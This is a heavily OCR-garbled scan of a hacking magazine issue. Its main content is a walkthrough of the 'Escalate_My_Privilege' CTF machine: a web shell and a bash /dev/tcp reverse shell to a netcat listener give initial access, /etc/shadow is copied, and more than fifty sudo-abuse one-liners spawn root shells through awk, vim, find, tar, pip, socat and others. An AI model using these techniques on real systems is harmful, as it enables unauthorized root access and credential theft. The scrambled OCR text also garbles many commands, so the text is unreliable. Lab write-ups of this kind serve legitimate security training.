Fe eee 2 Om od [6S AP ty cP) Hackercool TD ee eae ELUNE Sc BG Us coe meee aioe > Ree cae eae i 0:8 leases eee SUT a 3) | eee Sees De tk Ca ae sh to - . ‘e enon a0 Sut: se a a 8 Fe re mel i ° 1 se o~ o- lata Se ad eae Utne MT eeTeN ED] hseThen you will know the truth and the truth will set you free. John 8:32 Editor's Note Hello aspiring ethical hackers. Hope you are all awesome. We are back with our April 2020 Issue. Linux is the one ubiquitous operating system that you lwill definitely encounter in ethical hacking. So we decided to give our readers a ore guide on Linux Privilege Escalation. Although we wanted to cover the tire tutorial in one Issue we had some constraints and had to leave a part of this guide to the next Issue. However we suggest our readers to go through this \guide well through as it may provewery*helpful in your future. With all the pending Issues done, we are focussing our efforts on improving the quality of our Magazine to make it more helpful for our readers. Those who \kept faith in our Magazine will definitely enjoy the reward. We are also planning to bring some new Features to make the magazine more awesome. Also note that we have changed the named of the feature "Not Just Another Tool" to that lof "Tool of The Month" from this Issue. We are sure our readers will like this Issue. That's all we have for now. Until the next issue, Good Bye. Thank You. Stay Home, Stay Safe. oh-chakravanthe PASSWORDS ARE LIKE UNDERWEAR : DON'T LET PEOPLE SEE IT, CHANGE IT VERY OFTEN, AND YOU SHOULDN'T SHARE IT WITH STRANGERS. ~ CHRIS PIRILLOINSIDE See what our Hackercool Magazine April 2020 Issue has in store for you. . Linux Privilege Escalation : Exploiting sudo privileges, Kernel Exploits, Exploiting applications running as root . Hacking Q&A: Answers to questions our readers ask. . Installit : Installing Docker in Kali Linux 2020. . Metasploit This Month : Apache Activemg, Apache James & three Google Chrome exploit modules . Tool Of The Month : Nextnet - The pivot point discovery tool . Buffer Overflow : PART: 1 . Metasploitable Tutorials : Hacking the GlassFish server running on port 4848. . Data Breach This Month : Email it . Online Security : Are your Laptop and Mobile cameras secure?.ESCALATE MY PRIVILEGES : 1 LINUX PRIVILEGE ESCALATION in the field of cyber security, the knowledge of Linux plays a major role. From se- Irving majority of world's webpages and other services to spreading to the Internet Of Things the role of Linux has only increased now. There is a reason for Linux's popula- rity apart from being completely open source. It can be customized into whatever we ant : a server, a mobile OS, firmware, an alternative home OS or a penetration testin- distro like Kali Linux or Parrot OS for example. After repurposing everything, You c- ind publicize it as your own. No doubt it was once called the hacker's operating syste m because you can tinker with it as much as you can. After a stiff avoidance, even licrosoft is adopting Linux. The wide spread of this operaing system makes it all the jore significant in penetration testing. This is our small Feature so that our readers may understand how Linux privileges work, what is the importance of user and root rivilege and how user privilege can be bypassed to get root privileges. If you are a subscriber to our Magazine for a long time (let's say one and one and half year) ou would have seen many boot to root CTF challenges. The change of the terminal's indica tor from "$" to "#" was our ultimate goal most of the time. Why is this boot2root so important in CTF challenges. You need to understand Linux privileges to get any idea of its significanc- . Regular Windows users may know windows have two login accounts (actually four but we ave ignored Guest account here) : a standard user account and an Administrator account. fhile installing the recent versions of Windows, an administrator account is created by defau It which acts as the super user in Windows. However, In Windows 10 and Windows Server 12016, while installing, instead of Administrator account, a new user account is created which is a member of administrators group. The Super user has complete control over the system. Similarly like in Windows, Linux has three types of user accounts : regular, service nd the all powerful root account. Linux also, by default, while installing creates a regular or tandard user (a user account kali in Kali linux for example). In many Linux systems nowada- s, "Root" account is not even created or disable by default. This is because of the security ex of the control of this all powerful account in the wrong hands, You can compare this “root account with the Windows Administrator account but there is a minute difference. In Windows there is another account by default known as SYSTEM account which is used hy the operating system and other services of Windows. Well unlike Administrator account, y ou can't login as SYSTEM. It is an internal account and has FULL control over the system ju st like the administrator account. If our readers noticed many of the the Windows 10 privileg- escalation exploits we printed as part of our "Metasploit This Month" Feature, you would h- jave noticed that at the end we had "SYSTEM" privileges. The Linux root account has powers of both Windows administrator and SYSTEM accou-| )nt. It has absolute control over the Linux system. Identifiers lin Linux, users are classified into groups and they are identified by a Group identifier (GID) a-| \d every user is given a user identifier (UID). Users in Linux are identified using their UID an- bs As already told, there are three types of user accounts in Linux.hey are root account, regular user account and service account. A root account is always liven a UID of "0" by default. UID's from 1 to 99 are are reserved for some pre-defined syste- Im services like daemon, mail etc. UID's from 100 are reserved for standard users. However some Linux systems like RedHat reserve UIDs from 500 to standard users. Similarly Debian eserves UIDs from 1000 to standard users. But one thing is certain here, the UID of a root ecount is "0" Linux Privilege escalation can be achieved in number of ways. We are not going to irown you with that theory here. You will learn about each method as we do it practically. For his tutorial, we will be using a "Escalate_My Privilege" CTF machine created by the Author "Akanksha Sachin Verma”. This CTF machine can be downloaded from the given link below /e are performing this challenge on Vmware and our attacker operating system is Kali lLinux. So let's start from the beginning. The first stage of penetration testing (i.e after linformation g-athering ) is network scanning. We use Nmap for that. ery) 131-161 7.70 ( https://nmap.org ) at 2020-05 rt for 192.168 ctr eres) CeOe oat Bee i Se he target IP address of our target is 192.168.36.142. Since we have the IP addres: n it for any open ports. Starting N Nmap fiers hown NI PeoCny ea ee Ce oe rt d 06:df:a2:b9:b5:b9:3b:dd:b6 ( Ee ee nae http-tit All your doubts, queries and questions about ethical hacking and penetration testing can be sent to or get to us at our Facebook Page or tweet us ath11/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo | program version port/proto service (ee sere pbb VAce Mg Tet (ee Seb gre sr eee ace ee 2049/udp nfs (eed 20048/tcp mountd (eee 20048/udp mountd eeccese Brees mms ecese 46848/tcp _nlockmgr ees) ET PLyAce Meee (ee Cre y eee or 2049/tcp nfs_acl (or 2049/udp nfs_acl UCase G2) Service detection performed. Please report any incorrect results at https: //nmap| Tee bee Nmap done: 1 IP address (1 host up) scanned in 22.35 seconds ae | ur target has three open ports : SSH, HTTP, rpc and NFS. Before we even try to escalate uur privileges, we need to get a low privileged shell on the target. Right away we can see tha 1 the robots file is blocking one file named "phpbash. php". Let's go there directly. an interactive web shell th will allo apa ree peony inux my privilege 3,10.0-1062.18,1,e17.x86 64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86 64 x86 64laving apache user privileges. Let's see if we can escalate priv nt. For this, we use a simple tool called PE.sh that is available on Github. It will scan and tell lus the privilege escalation possibilities on the target system. We have used it on one of our lprevious CTF challenges. ie Meu d ar (ea) 5 Seu Cary Steet Ree oe a lUsing the simple python web server, | download it to the target mp" folder :/var/www/html# cd /tmp :/tmp# wget http: //192. 168.36. 130:8000/PE.sh 2020-05-03 08:20:58-- http://192.168.36.130:8000/PE.sh Connecting to 192.168.36.130:8000... connected. Dees gC eG eee CLM cae eer Saving to: 'PE.sh Ce ene ern rrrrereras CIS Or yr 2020-05-03 08:20:58 (1.42 MB/s) - 'PE.sh' saved [47500/47500] a ad ae :/tmp# chmod 777 PE.sh chmod: changing permissions of 'PE.sh': Operation not permitted Pr Ca Ree a eR ee iat the download is successful, we failed to get execute permi nly root user can do this. So we start our search to find another v ey ome) es ea fac ler le meas Coe ae Re ee eee etl ens Dae Ce eeeatgis PeedAfter browsing the file system, we found a user directory named "armour" in which there's a ile named Credentials.txt. The contents of the file appears to be a direct hint to this user’ password. It should be md5 hash of rootroot1 Sw Au eal eae le LT) b7bc8489abe360486b4b19dbc242e885 - :/home/armour# | st thi eee Password: su: Authentication failure Pe ae Ls Password: su: Authentication failure We can't just directly login as user armour. This shell is very restricte 's find another way| 10 do this. Pre rey) Listening on [any] 1234 . We can use simple bash command to start another shell as shown below. eT Password: su: Authentication failure ee ee iy su: Authentication failure /hone/armour# nc Ca) /hone/armour# bash -i >& /dev/tcp/192. 168.36. 13/1234 >&1 we run the above command, we get another shell on the netcat listener we strate Pere eee) [eer mcg ieee Coe Re CEC eee mC CeCe mrs ee aa OCR ee ee SMe Cee Cee ee Pe Ped oC Raum scent bash-4.2$ et's try to login now as user "armour’ Pee PET) poco URC gerry 192.168.36.142: inverse host lookup failed: Unknown host (ta ao OC yet ee PDR LeeLee eee Pee | oe Ree Umer ce cael lbash-4.2$ su armour Me Password: b7bc8489abe360486b4b19dbc242e885 rt) eeu mees \800(armour) group: 096 (armour) ,31(exim)ETT Password: b7bc8489abe360486b4b19dbc242e885 id luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) EMS Uae 1ST STU dS 7, bash: Line 2: pyhton3: command not found lpython3 -c ‘import pty;pty.spwan("/bin/bash")' Lier Uae cee) iCectcetr aman eC es Meee ices eesti Care CM Smo ace Cm python3 -c ‘import pty;pty.spawn("/bin/bash")' [armour@my privilege ~]$ fj As you can notice, the UID of the user "armour" is 1000 which means he is a standard user. INow let's try privilege escalation. What should we try first? Hmm. What about exploiting expl- oiting sudo privileges. Yeah, let's try that first. ECan Eres Perum cece eC m eto RCo ioe tee tas Pees CC PME Mea Ce Ut Yt a ea eee eRe ome env Gass ee Re mR ec eee RN eb Opal een Cl ee ee ear he Rem a Ce en ee ee ee Cee CC Men Came CU aaa Co et secure path=/sbin\:/bin\:/usr/sbin\:/usr/bin ee eC ee asta Cy (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish, /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc, /ust/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh, /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano, /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk, /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red, /ust/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp, /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd, /ust/bin/head, /usr/bin/\n, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail, /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip, 7usr/bin/mount, /usr/sbin/mtr, /usr/Din/mysql, /UST/DIn/nawk, /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od, /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip, /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap, /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts, /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch, /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat, /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace, er Urata tie, Uncrate) Suga /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp, /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul, /ust/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,So many programs have been given sudo privileges. But what exactly is exploiting sudo right s We have used this many times in our Magazine previously to get root on the system. Exploiting SUDO Privileges lin Linux, sometimes standard users need root privileges (privileges of a super user) to execu te some commands or run some programs. There are two ways of doing this. Allowing the fstandard user to login as root user by providing credentials. Although looking simple, this can be risky. Allowing the standard user run as a root user to just run one command can be very lestructive to the system. That is where sudo comes handy. SUDO lets standard users run programs (or command) with the privileges of the root user. There is no use for standard use + to login as super user. However it has its own risks. The programs which are allowed to be executed by stan- dard users with the privileges of the root user have to be carefully chosen. There is no proble m if a standard user is allowed to execute ping command with the privileges of root user but hat if he is allowed to run Nmap with the privileges of root user. Well You will see Given below are multiple ways of how to exploit SUDO privileges to gain a root shell ont he Linux system. 1. bash [Bash stands for Bourne shell and it was one of the first shells used in Linux. com eu eC ETON SUL! OW sua Cm ek Lae) Ft) CEG st 2. tesh [Te see shell is another type of shell in Linux based on C. armour@my privilege ht Stace) Brea siyace tput: unknown terminal “unkn tcsh: using dumb terminal settings ecm ett ee et) cna ete shell ux based on C. [armour@my privilege html] Ea erste) nee Car ama ara csh: using dumb terminal settings ecm Tere me et)sh, ksh, rksh, zsh, fish and dash are other types of shells and sudo privileges on them can b exploited in the same way show above. 4. tmux ‘mux or terminal multiplexer is an alternative to screen with the ability to open multiple windo ws. It can be used to get root shell too. een ret ec ira pT) uid=1000(armour) gid: Cen Tan st) CEC m etic ener /bin/b udo tmux -c /bin/bash [root@my_privile scp or secure copy command in linux is used to copy files from one system to another syste m in a secure way. evar Om eae ae it ROC Cem CoC CMe min sce Ber Csh)) {armour@ny privilege html]$ mktemp) hc=$(mktemp Ee! ecm ie CNC Rr 6a se eT Dao we oie cm etre ane ee amar is ee eT ecm Te Cra Mle rae sudo scp -S $he x y Peet meRCR me Ur coc leg {armour@ny privilege html sudo scp aera (root) groups=0(root) 6. rootsh Rootsh is a shell which allows logging of input and output. Pico mec Ces reT) id luid=1000(armour) elem Tey rmour) ,31(exim) eCom e tet RCI Se Mere cme tC Re Let! id rem cersia) (root) groups=@( root) 7. awk Awk is a scripting language that is also used for pattern scanning{armour@ny privilege html]$ id st uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm etre Mle ree et ae <9 0m Cua, Qe sudo awk ‘BEGIN {system("/bin/bash")} cmp eet) id uid=0(root) gid=0(root) groups=0(root) [rooteny privilege html]? & ISimilar to awk, we also have gawk (GNU awk) and nawk (New awk) 8 ed ed is a text editor with minimal interface. ETc meee eT aT) sudo ed ;/bin/bash ;/bin/bash B TSU ey SUVA Riera Ft luid=0(root) gid=0(root) groups=6(root) [Similarly we have "red" which stands for restricted ed 9. env .d to print Linux variables. Enc aneCCTerET) Ft) uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) Enc me tei ere Rim Sue) sudo env /bin/sh ecm ett meet) ty Ree eras Ce KSI Le ks) 10. chmod Jur readers know that chmod command is used to change permissions of a file. Do you rem- ember the file we downloaded onto the target system and were unable to change permission s. Now we can do it. Eco me CS ET) Ft uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm te eats ee as aa eo FILE=/tmp/PE.sh [armour@ny privilege ~]$ sudo chmod 0777 $FILE sudo chmod 6777 $FILE ecm ie iC ee CEA ee eee xtwxtwx 1 root apache 47500 Mar 26 04:31 /tmp/PE.shAs you can see, the permissions of the file have changed now. 11. chown ISimilarly chown can be exploited as shown below to change the ownership of file. encom ele eer ea a ose) plane ase) [armour@my privilege ~]$ sudo chown $(id -un):$(id -gn) $FILE sudo chown $(id -un):$(id -gn) $FILE [armour@my privilege ~]$ ls -1 /tmp/PE.sh (ee ee Dear Rm ee Rae ee [armour@my privilege -]$ ff 12. cp he cp command with sudo privileges can be exploited to copy a file on which only r lhas authority to a different file. For example, let's say the user doesn't have permissions to iew the /etc/shadow file. It can be copied into another file as shown below. [armour@ny privilege ~]$ id rt ore ee aCe la em gel eC Le lai eee Ce kD) y_privilege ~]$ FILE=/tmp/copied. txt ero meas eT Cm Leet ROR si MCW Me OMe ede me echo "DATA" | sudo cp /etc/shadow "$FILE" mour@ny privilege ~]$ ToC os ‘tmp/copied. txt POD tere nr on era yee CACO aCe a neg PoUstier es eC er ad Sater iy ldaemon: * :16372:0:99999:7 SCE eee sync: *:16372:0:99999:7 shutdown :* :16372:0:9999 halt :*:16372:0:99999:7 Dees CSTrerEe Crees CELE eee CEST C Ey irae Ee occ ie] eee eee EL CEs PDair His eEse) dbus: !!:18313 polkitd: !!:18313 tss:!!:18313 eects Cte) 13. cut he cut command in Linux is used to cut out a part of each line and view the result. Here we an exploit it to do the same to files with higher privileges.a eT sudo cut -d "" -fl "$FILE" root: $6$1Yoxb/H/@LQ5d50Q$mM2ej 4Um6zmkg11uszJr8pZ0/vI4TT6nEvOnLnI/GLB9Ot FNIYNOxXF JATAXVAUz j 40} TE1pmFbY12NUzw2 j /b0: 18313:0:99999: 7: : bin: *:16372:8:99999:7: daemon: *:16372:0:99999:7 [Similarly cat, jq, dd, arp, base64, date, diff , mtr, nl, od ul, unexpand, iget, xxd, expand, file, finger, fmt, fold, grep and head can be exploited to view the files restr icted to the normal user. hice command in Linux is used to execute a program with scheduling {armour@ny privilege html]$ id id uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@ny privilege html]$ sudo nice /bin/sh sudo nice /bin/sh Tce tC Reet! id uid=0(root) gid=@(root) groups: [root@ny privilege html]# Wf 15. ftp IFTP as you all know is file transfer protocol Putco m ele CRT) id uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ECM etetC Mere CEs) eae ftp> !/bin/sh AU) sh-4.2# id id uid=0(root) gid=0(root) groups=0(root) sh-4.2# Jf 16. zip ip command is used to compress files in linux. Even this command can be exploited to grab a root shell l[armour@ny privilege html]$ id re er Eales ela ee tee es elie ea sty) cum rete Orie iC cc me) ede ae) uC M ECG RC MOS sO i692. ee Bist ae c0/ tc adding: etc/hosts (deflated 65%) (root) qid=0(root) groups=0(root)mount command is used to mount file systems but with sudo privilege it can be exploited to let a root shell as shown below. [armour@my privilege html]$ id id 1id=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) {armour@ny privilege html]$ sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount ecm stake Ure Omens Breas acm eC Ree) id Peete mC ere mre ee Ter 19) {root@my privilege htmU# ff {armour@ny privilege html]$ id BCS C Cem CCC em cr cs Cae mer Cost) ecm ete RC MeO MMe Mn Md Od sudo mysql -e '\! /bin/bash* encom etc ele et) (root) groups=8(root) {root@my privilege htm# ff {armour@ny privilege html]$ id 080(armour) groups=1600(armour) ,31(exim) Cm ete RC MOE Mi Meme ern merece eT ee SY {stdio: [0, 1, 2]});' $(tty) 2>$(tty)')" > $TF/setup.py FU] Sy) Or e100 1h s 9s) (iCm ett ROP Oe St Ur mei sudo pip install $TF Becesur Mac ac SBC geo Ceo Me PC LOk 9 Me e119) sh-4.2¢ Wf 22. perl Perl is a programming language installed by default in linux systems. luid=1000(armour) gid=1000(armour) groups=1000 (armour) ,31(exim) [armour@ny privilege pip-_W7248-build]$ sudo perl -e ‘exec "/bin/sh EN ia ee ncaa] cpm aie Estee ce eC) i (eters Peed me Let) ‘oot) [rooteny privilege pip- w7248-build]# ff 23. puppet Puppet is a configuration management tool in Linux. j=1080(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@my privilege html]$ sudo puppet apply -e “exec { '/bin/sh -c \"exec sh pare tess) 1055) es 10557 NU $(tty) 2>$(tty)\"': }" eee Coe ea WAU Ree SO eee ORC ee Co ea AU Re SO eee OC cm iter ec ieret) id [root@my privilege html]# 9 24. rsyne IRsync or remote sync is a popular command used for copying and synchronizing files and fol Unix or Linux s luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm pCrR Cs CM Teer Met Mr ae Mes Mee oe cs CLAP] mnie eT ee CL TL et) id BC Core Ce IS el ee LteS) sh-4. 27IRuby as our readers know is a programming language {armour@ny privilege html]$ id i Cee m CCC Re me oC e Bestest) {armour@ny privilege html]$ sudo ruby -e ‘exec "/bin/sh" ET (Ma) ae SC CoM CY tea com eet See Lae rt) luid=@(root) gid=6(root) group [root@my privilege html]# Wf 26. sed ISed or stream editor is a command which performs multiple functions on a file lik lsearching and replacing Grom ete cere) Ft CSC ee me Cas Cee el os C eel eee Ce [armour@ny privilege html]$ sudo sed -n ‘le exec sh 1>&0' /etc/hosts sudo sed -n ‘le exec sh 1>86' /etc/hosts Sib eee see ee Rae) eet) rt) uid=0(root) gid=0(root) groups=0(root) sh-4.2% 27. setarch ISetarch is a shortcut for Set architecture. It is used to set architecture (x86_64 or i386) in a program environment Cuca erie Reet) FT luid=1000(armour) gid=1600(armour) groups=1000(armour) , 31(exim) [armour@ny privilege html]$ sudo setarch $(arch) /bin/sh PEC SUA [root@my_privilege html]# id id luid=0(root) gid=0(root) groups=0( root) [rootany privilege html]# Bf 28. socat ISocat stands for SOcket CAT. It is a network utility like netcat. It is bidirectional. We hav n privilege escalation using socat in CTF challenge of Maskcrafter : 1 in our January 2020 issue. It is done as shown below. We first start a listener on attacker machine as s! e image given below. :-$ socat file: tty’ ,raw,echo=@ tcp-Listen:1235cm ett) id RCO C mC Ce Mem gr ese te mers) aco mete CMO Mest yae oe EL) IRHOST=192. 168. 36.130 Reco Mm Te CRIM ates eee) aU ees) CCM eCPM UCM Me Lace ee Mae UE Sia UMS eI 1S AEE derr, setsid, sigint, sane tee ane ee ee Sere a ee esC Rt Uae $ Soon as we run these commands, we get a root shell as shown below. Pers MC A me etc user) rac Om Teen Ie E eC) Beer ene et err 9) [root@my privilege html]# §j |Stdbuf provides modified buffering operations for standard streams. ecm Cree) 100(armour) gid=1000(armour) groups=1000(armour) , 31(exim) [armour@my privilege html]$ sudo stdbuf -i9 /bin/sh trac mete ane Let) CeCe me osm ess [caret MOE | 30. strace |Strace is a Linux debugging and troubleshooting tool. era ele eer eT) luid=1000(armour) gid=1000(armour) groups=1000(armour) , 31(exim) eC m te Nei Mle es ease cee Ue Ue) {root@my privilege html]# id CeCe MTom et Tied) (root@ny privilege html # 31. systemet! |Systemetl is a system management tool in Linux. It is used to control the systemd system an- service. Encrme tc ee ret) SCC ee CoC em er os Cee mee CoetD} CCM tr RO EeS RS cuaae WARNING: terminal is not fully functional ea) ewer ae) BCE ders) (root) groups=0(root) sh-4.2# Wf —eeeeEeEeEeee___e EE EN_ Ome32. taskset IStdbuf provides modified buffering operations for standard streams Cucm pear M erect ime [rooteny privilege html]# id Pee Tie me Ce iis mie froot@my privilege html] # tclsh ‘lsh is a shell-like application that reads Tcl commands from a file or its standard input. Tol ls a simple scripting language. cm et Cur ety uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) Rea etic Re Set ce SOA eca Unc are Ce CMe a eae CeCe meas mes 34. time he time command in Linux is used to see how long a command takes to run or execute. Ith elps in checking performance of the commands and scripts. [armour@ny privilege html]$ id luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31( [armour@ny privilege html]$ sudo /usr/bin/time /bin, ecm ett ee Lae) uid: (root) groups=0(root) ieee etre mag 35. timeout he timeout command is used to run a program or command with preferred time limit. If the ommand takes more time than the preset limit, it closes. Ptncm erie ecu ret) tetera) CCR ees CC ip heros tn) [armour@ny privilege html]$ sudo timeout -- foreground 7d /bin/sh rca sie nue Let) luid=0(root) gid=0(root) groups=0(root) cm aC meg 36. unshare he unshare command allows users. to run a program or script with specific namespaces ‘unshared’ from its parent. tice as) luid=1000(armour) gid=10t i 0 Eales mee eeu {armour@my privilege html]$ sudo unshare /bin/sh compe One et) OC eee) (root) ica e wee37. xargs args command reads streams of data from the standard input and passes its output as an 'gument to another command. inca CI EET) luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@ny privilege html]$ sudo xargs -a /dev/null_sh rac Te tstC aCe Ea Se Cee melee) CENA MOE | 38. PHP. luid=1000(armour) gid=1000(armour) groups=1000(armour) , 31(exi [armour@ny privilege html]$ CMD="/bin/sh" ea ure ecm Le CSR MOM OM Me mm F< BC ema ru erce Cenc Mune lusing dumb terminal settings Cer ee ae id OCS Me eee me leer a 000(armour) gid=1000(armour) groups=1000(armour) , 31(exim) armour@my privilege html]$ sudo vim -c ':!/bin/sh' sudo vim -c ':!/bin/sh* PU Re eC ae Ure eau iaee Satter eC ete continue: !/bin/sh POS re me errs mel Tt 9) Hiner | 40. vi he timeout command is used to run a program or command with preferred time limit. If the ommand takes more time than the preset limit, it closes. luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@ny privilege html]$ sudo vi -c ':!/bin/sh' /dev/null sudo vi -c ':!/bin/sh’ /dev/null Piece Stet mire Me tc) Geen ees ec eC mstiTs UEC i ame Ce Tae ments A OYE) sh-4.2# id id Rots ee ors es ish-4.27 Bf{armour@ny privilege html]$ id i) Ce CSCC em Er SCC ames sc)) ecm ete CR CIO eet OMe Morse i en ood Eee MC ec en oe Od Ce eee ae) Ft luid=0(root) gid=@(root) groups=0(root) Eee 42. tar stands for tape archive. It is used to create and extract archives. TuticmirtC CR ree it 1000 (armour) 1000(armour) groups=1000(armour) ,31(exim) ecm ett MCD ee clas mee OZ PLA eer ras et lheckpoint -action=exec=/bin/sh Raza aaeerera cs checkpoint-action=exec=/bin/sh Seu CU eae med ish-4.2# id luid=0(root) gid=@(root) groups=0(root) sh-4. 2 Wf 43. rpm RPM (Red Hat Package Manager) is the default package management utility for RedHat sys- cmc Cua Maer clean itch eee as UL CAC ER Soa Uc luid=@(root) gid=®(root) groups=0(root) cw Expect command is used to automate providing inputs to scripts that expect id 1id=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ECO m ie CC CROP OR tae Ce Ur uci Tad EN Ct Saat ee, Sy Pe hie Taal SAL) acm ett ROCs id Fee tom eer rO es ee Tr 9) [root@ny privilege htmll# 45. find |Find command, as its name implies is used to find specific files on the Unix system. Itis like earch in Windows.luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@my privilege html]$ sudo find exec /bin/sh \; -quit sudo find . -exec /bin/sh \; -quit [root@my privilege html]# id id luid=0(root) gid=6(root) groups=0(root) froote@my privilece htm Wf 46. less lLess command is used to view one page of a large file. 1id=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) armour@ny privilege html]$ sudo less /etc/profile Pmt, eet (UD Ce uC eee a amas Cirle Cee eMC Tem at EA Se SUE fede) d 1id=@(root) gid=@(root) groups=0(root) 47. more |More command is used to view large files with scrolling. {armour@ny privilege html]$ TREM= sudo more /etc/profile Usenet OC eee Ta # /etc/profile 1 System wide environment and startup programs, for login setup Piast Mie el ecr ee Umsace7 relied eee Ce ne emer Cee mC ae] Pk SU ee eee ee aCe Ce eae eet /etc/profile.d/ to make custom changes to your environment, as this will prevent the need for merging in future updates CULO mEe Pars CNL eae) *:°$1":*) sD) if [ "$2" = "after" ] ; then NaN EES Oe NSS ELL rt More-- (33%) !/bin/sh SAD Cin erase cl id luid=0(root) gid=0(root) groups=0(root){armour@ny privilege html]$ id id oreo me es C Le ie meee os Cele es eee aes {armour@ny privilege html]$ sudo python -c ‘import os; os.system("/bin/sh") sudo python -c ‘import os; os.system("7bin/sh") EG met Cre) rT uid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm ete Ce OES Ruma ete Urea Ur ee Cm ares meas tlle (ices ai sue) TT SUEY ere) id Oe Cem el el tere) sh-4.2¥ 50. script [Script command is used to record all the terminal activities. [armour@ny privilege man]$ id id uid=1000(armour) gid=1000(armour) groups=1000(armour) , 31(exim) [armour@ny privilege man]$ sudo script -q /dev/null sudo script -q /dev/null eco m ett Lat) ct) Cera me ters ee ee TS) [rootany privilege man]# If 51. busybox |Busybox, popularly known as Swiss army knife for Linux provides several UNIX utilities in on e single package. {armour@my privilege html]$ id i luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm APR MISES MST cae Eres ae ery Cm eta MSE ae Ft eee eco) Ges re 19) [root@ny privilege html]# 9ecm ee net) it luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@ny privilege man]$ sudo nmap --interactive sudo nmap --interactive Starting Nmap V. 5.21 ( http://nmap.org ) Pee cet a eee ee ee ae) ee Pe lunknown command (:sh) -- press h for help luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm ett MIO Pet OMe re me PO cece Ce am eCmO asta ie aie sue st ier ae rt CoCr 9 MP Od ke) sh-4.2# 54. easy install install is a package manager for Python. In modern systems, it is replaced by pip. [armour@my privilege html]$ TF=$(mktemp -d) Ue Uae ee) CM Te Ce RC MO EM cat Ms Ua SPM Mil O97) es h_<$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py <('/bin/sh', 'sh', '-c', ‘sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py cm eR Teast ecm Uc Reeid Brome c mrss Processing tmp.bbnédFm1EU Writing /tmp/tmp.bbnOdFm1EU/setup.cfg Running setup.py -q bdist_egg --dist-dir /tmp/tmp.bbnOdFm1EU/egg-dist -tmp-SnGzr Ey Sree) id sid=@(root) gid=0(root) groups=0(root) p55. facter |Facter command is used to see current server information like hardware details, network sett ings and kernel information etc. {armour@my privilege ~]$ id it luid=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim eu cm Te NERC ES Eee TGs ee) eusc aerd) [armour@ny privilege -]$ echo ‘exec("/bin/sh")' > $TF/x.rb echo ‘exec("/bin/sh")' > $TF/x.rb ACO me eR ee Eee Cem Cac Gales eC ae The ZFS modules are not loaded Wee U Ree SU eee The ZFS modules are not loaded AO ee Ue eee tearoom Tete Lec wet) iT) [eer cueeN et eed 1900(armour) gid=1000(armour) groups=1000(armour) ,31(exim) ecm Tete Ce cle eet alsa a SU) sudo flock -u / /bin/sh terra ete CRUSE aC at ToC Gxt Me Pte Ca 9 Me Lal) {rootemy privilege htmll# i ant in our pre\ l4id=1000(armour) gid=1000(armour) groups=1000(armour) ,31(exim) [armour@my privilege html]$ sudo gdb -nx -ex '!sh' -ex quit ETO eae a a TS EU nC Re ec UT aa oe es eee eee OREM ee Me Ls Ce Cm Rte rem comes CER Clean ac e7/ Ue Aeterna Loe Ce Ee RRC Mes eae eee eC RCC ACR ci veses a COM ME SU Serum eae Geek MC eRe Ren eee te For bug reporting instructions, please see gnu.org/software/gdb/bugs/> sid=@(root) gid=0(root) groups=6(root) sh-4.2# WfJuling class and priority for a program. [armour@ny privilege html]$ id Fe) OCC em CC CR Mem ct ese iug mes Cost) [armour@ny privilege html]$ sudo ionice /bin/sh sudo ionice /bin/sh ecm te teiC meee id To CR LOM: CeO 19 Tk) e119) CENA MINES | Rucumene eer eT rt) uid=1000(armour) gid=1000(armour) groups=1000(armour) 